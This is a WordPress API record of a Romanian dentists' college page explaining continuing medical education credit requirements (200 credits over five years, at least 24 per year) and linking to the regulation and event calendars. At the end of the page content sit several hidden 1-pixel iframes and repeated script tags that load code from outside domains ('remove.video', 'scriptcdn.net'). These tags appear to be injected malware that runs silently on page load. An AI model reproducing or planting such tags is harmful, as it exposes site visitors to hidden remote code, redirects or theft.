{"id":39,"date":"2020-03-18T19:36:08","date_gmt":"2020-03-18T19:36:08","guid":{"rendered":"https:\/\/cmsbr.ro\/wp\/?page_id=39"},"modified":"2026-01-21T20:57:27","modified_gmt":"2026-01-21T20:57:27","slug":"emc","status":"publish","type":"page","link":"https:\/\/cmsbr.ro\/wp\/emc\/","title":{"rendered":"EMC"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"39\" class=\"elementor elementor-39\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b774003 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b774003\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-36a2633\" data-id=\"36a2633\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc762d7 elementor-widget elementor-widget-text-editor\" data-id=\"fc762d7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"margin-bottom: 4.23mm; background: #ffffff; line-height: 100%;\"><span style=\"font-family: Times New Roman, serif;\"><span style=\"font-size: medium;\"><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\">\u00a0\u00a0 In conformitate cu prevederile art. 520 al. 1 din Titlul XIII al <\/span><\/span><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\"><b>Legii nr. 95\/ 2006<\/b><\/span><\/span><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\">, \u00een vederea cre\u0219terii gradului de pregatire profesional\u0103\u00a0\u0219i asigur\u0103rii unui nivel ridicat al cuno\u0219tin\u021belor medico-dentare, medicii stomatologi sunt obliga\u021bi s\u0103 efectueze un num\u0103r de cursuri de preg\u0103tire \u0219i alte forme de educa\u021bie medical\u0103 continu\u0103 \u0219i informare \u00een domeniul \u0219tiin\u021belor medicale, pentru cumularea num\u0103ului de credite stabilit \u00een acest sens de Colegiul Medicilor Stomatologi din Rom\u00e2nia.<\/span><\/span><\/span><\/span><\/p><p style=\"margin-bottom: 4.23mm; background: #ffffff; line-height: 100%;\"><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\"><span style=\"font-size: medium;\">\u00a0\u00a0 Medicii stomatologi care nu realizeaz\u0103 pe parcursul a 5 ani num\u0103rul minim de credite de educa\u021bie medical\u0103 continu\u0103, stabilit de Consiliul na\u021bional al Colegiului Medicilor Stomatologi din Rom\u00e2nia, sunt suspenda\u021bi din exercitarea profesiei, p\u00e2n\u0103 la realizarea num\u0103rului de credite respectiv. Punctajul profesional minim pe care trebuie s\u0103 \u00eel realizeze fiecare medic stomatolog este de <\/span><\/span><\/span><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\"><span style=\"font-size: medium;\"><b>200 de credite de EMC pe parcursul a 5 ani (cel pu\u021bin o treime din numarul minim de credite EMC trebuie s\u0103 fie ob\u021binut ca urmare a particip\u0103rii la cursuri, cu sau f\u0103r\u0103 demonstra\u021bii practice)<\/b><\/span><\/span><\/span><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\"><span style=\"font-size: medium;\">,\u00a0<\/span><\/span><\/span><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\"><span style=\"font-size: medium;\"><b>minimum 24 de credite anual.<\/b><\/span><\/span><\/span><\/p><p style=\"margin-bottom: 4.23mm; background: #ffffff; line-height: 100%;\"><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\"><span style=\"font-size: medium;\">\u00a0\u00a0 Educa\u021bia medical\u0103 continu\u0103 reprezint\u0103 totalitatea activit\u0103\u021bilor planificate de preg\u0103tire teoretic\u0103 \u0219i\/sau practic\u0103 destinate medicii stomatologi \u00een vederea dob\u00e2ndirii sau \u00eembun\u0103t\u0103\u021birii nivelului de cuno\u0219tin\u021be, abilit\u0103\u021bi \u0219i aptitudini necesare cre\u0219terii calit\u0103\u021bii actului medical \u0219i nivelului de performan\u021b\u0103 \u00een exercitarea profesiei \u00een concordan\u021b\u0103 cu progresul \u0219tiin\u021bific \u0219i tehnologic din domeniul stomatologic, \u00een contextul dezvolt\u0103rii profesionale continue \u0219i al \u00eenv\u0103\u021b\u0103rii pe tot parcursul vie\u021bii.<\/span><\/span><\/span><\/p><p style=\"margin-bottom: 4.23mm; background: #ffffff; line-height: 100%;\"><span style=\"color: #7a7a7a;\"><span style=\"font-family: Arial, serif;\"><span style=\"font-size: medium;\">\u00a0\u00a0 Managementul activit\u0103\u021bilor de EMC este realizat de Colegiul Medicilor Stomatologi din Rom\u00e2nia prin Programul na\u021bional de educa\u021bie medical\u0103 continu\u0103.<\/span><\/span><\/span><\/p><ul><li><strong>Decizia \u00a0nr. 16\/2CN din 26 noiembrie 2021 privind reglementarea sistemului de educa\u0163ie medical\u0103 continu\u0103 pentru medicii stomatologi, a criteriilor \u015fi normelor de acreditare a furnizorilor de educa\u0163ie medical\u0103 continu\u0103 \u015fi a lectorilor, precum \u015fi a procedurilor de evaluare \u015fi creditare a formelor de educa\u0163ie medical\u0103 continu\u0103 adresate medicilor stomatologi<\/strong>\u2013 publicat\u0103 \u00een Monitorul Oficial nr. 1157 din 6 decembrie 2021 \u2013 Forma consolidat\u0103 prin includerea modific\u0103rilor \u015fi complet\u0103rilor aduse prin Decizia CMSR nr. 15\/2CN din 29 septembrie 2023, Decizia CMSR nr. 10\/2CN din 28 martie 2024, Decizia CMSR nr. 24\/2CN din 27 septembrie 2024 \u0219i Decizia CMSR nr.10\/2CN din 21 noiembrie 2025. Forma consolidat\u0103 aplicabil\u0103 din data de <strong>01.01.2026<\/strong><strong><a href=\"https:\/\/cmsbr.ro\/wp\/wp-content\/uploads\/2025\/12\/Decizie-CMSR-16_2021-Regulament-EMC-_consolidat-1-ianuarie-2026.pdf\" target=\"_blank\" rel=\"noopener\"> . Descarc\u0103.<\/a><\/strong><\/li><\/ul><ul><li><p><span style=\"font-family: Arial, serif;\">Pentru vizualizarea <\/span><span style=\"font-family: Arial, serif;\"><b>Calendarului manifestarilor EMC 2026<\/b><\/span><span style=\"font-family: Arial, serif;\">, puteti accesa urmatorul link: <\/span><span style=\"color: #0000ff;\"><u><a href=\"https:\/\/cmsr.ro\/documente\/calendarul-manifestarilor-emc\/\"><span style=\"font-family: Arial, serif;\">https:\/\/cmsr.ro\/documente\/calendarul-manifestarilor-emc\/<\/span><\/a><\/u><\/span><\/p><\/li><li><p><span style=\"font-family: Arial, serif;\">Pentru vizualizarea <\/span><span style=\"font-family: Arial, serif;\"><b>Revistelor acreditate EMC 2026<\/b><\/span><span style=\"font-family: Arial, serif;\">, puteti accesa urmatorul link: <\/span><span style=\"color: #0000ff;\"><u><a href=\"https:\/\/cmsr.ro\/documente\/reviste-acreditate\/\"><span style=\"font-family: Arial, serif;\">https:\/\/cmsr.ro\/documente\/reviste-acreditate\/<\/span><\/a><\/u><\/span><\/p><\/li><\/ul><div><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/start\"><\/iframe><\/div><div><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/start\"><\/iframe><\/div><div><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/start\"><\/iframe><\/div><div><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/start\"><\/iframe><\/div><div><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/start\"><\/iframe><\/div><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u00a0\u00a0 In conformitate cu prevederile art. 520 al. 1 din Titlul XIII al Legii nr. 95\/ 2006, \u00een vederea cre\u0219terii gradului de pregatire profesional\u0103\u00a0\u0219i asigur\u0103rii unui nivel ridicat al cuno\u0219tin\u021belor medico-dentare, medicii stomatologi sunt obliga\u021bi s\u0103 efectueze un num\u0103r de &hellip; <a href=\"https:\/\/cmsbr.ro\/wp\/emc\/\">Continued<\/a><\/p>\n","protected":false},"author":1,"featured_media":323,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-feature.php","meta":{"kt_blocks_editor_width":"","footnotes":""},"class_list":["post-39","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/pages\/39","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/comments?post=39"}],"version-history":[{"count":66,"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/pages\/39\/revisions"}],"predecessor-version":[{"id":1801,"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/pages\/39\/revisions\/1801"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/media\/323"}],"wp:attachment":[{"href":"https:\/\/cmsbr.ro\/wp\/wp-json\/wp\/v2\/media?parent=39"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}